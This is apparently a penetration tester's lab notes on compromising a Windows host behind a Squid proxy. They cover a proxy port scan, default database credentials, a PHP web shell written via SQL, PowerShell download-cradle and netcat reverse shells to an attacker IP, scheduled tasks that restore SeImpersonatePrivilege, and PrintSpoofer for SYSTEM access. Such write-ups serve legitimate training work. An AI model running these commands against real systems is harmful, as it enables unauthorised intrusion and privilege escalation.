Comment on page
squid (Squid proxy & localservice priv for newer windows)

​https://github.com/aancw/spose​
spose is a port scanner for when a squid proxy is running on a target. 
usage: spose.py [-h] [--proxy PROXY] [--target TARGET]
python3 spose.py --proxy http://192.168.164.189:3128 --target 127.0.0.1if you get logged in with default creds(username:root, no-pass),
you might try running the following in the SQL query
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE 'C:/wamp/www/cmd.php' 
and run
curl "http://127.0.0.1:8080/cmd.php?cmd=whoami" --proxy 192.168.120.223:3128 
or  visiting the site
Now we have RCE!
127.0.0.1:8080/shell.php?cmd=powershell IEX(New-Object Net.WebClient).downloadString('http://192.168.49.164/tcp_power.ps1')
​
got a rev shell.
Still cannot access the administrator folder.
When you are in local service account, you can regain permissions by scheduling a task
Give Me Back My Privileges! Please? | itm4n's blog
​
$TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\wamp\www\nc.exe 192.168.49.164 4444 -e cmd.exe`""
Register-ScheduledTask -Action $TaskAction -TaskName "Grants"
Start-ScheduledTask -TaskName "Grants"
 
Now we've got a rev shell with more privileges
​
Reading through the privileges we have now, it's confirmed that the SeImpersonatePrivilege is missing but that can be retrieved by creating a ScheduledTaskPrincipal where we can specify SeImpersonatePrivilege in RequiredPrivilege attribute.
# Create a list of privileges
PS C:\Windows\system32> [System.String[]]$Privs = "SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeImpersonatePrivilege", "SeIncreaseWorkingSetPrivilege"
​
# Create a Principal for the task 
PS C:\Windows\system32> $TaskPrincipal = New-ScheduledTaskPrincipal -UserId "LOCALSERVICE" -LogonType ServiceAccount -RequiredPrivilege $Privs
​
# Create an action for the task 
PS C:\Windows\system32> $TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `"C:\wamp\www\nc.exe 192.168.49.164 4445 -e cmd.exe`""
​
# Create the task
PS C:\Windows\system32> Register-ScheduledTask -Action $TaskAction -TaskName "GrantAllPerms" -Principal $TaskPrincipal
​
TaskPath                                       TaskName                          State     
--------                                       --------                          -----     
\                                              GrantAllPerms                     Ready     
​
# Start the task
PS C:\Windows\system32> Start-ScheduledTask -TaskName "GrantAllPerms"
SeImpersonatePrivilege is on now! Let's get into the system with printspoofer!
powershell (New-Object Net.WebClient).DownloadFile("http://192.168.49.164:8080/PrintSpoofer.exe","C:\wamp\www\prints.exe")
​
rooted! 
Proving Ground
DC-1
Last modified 1yr ago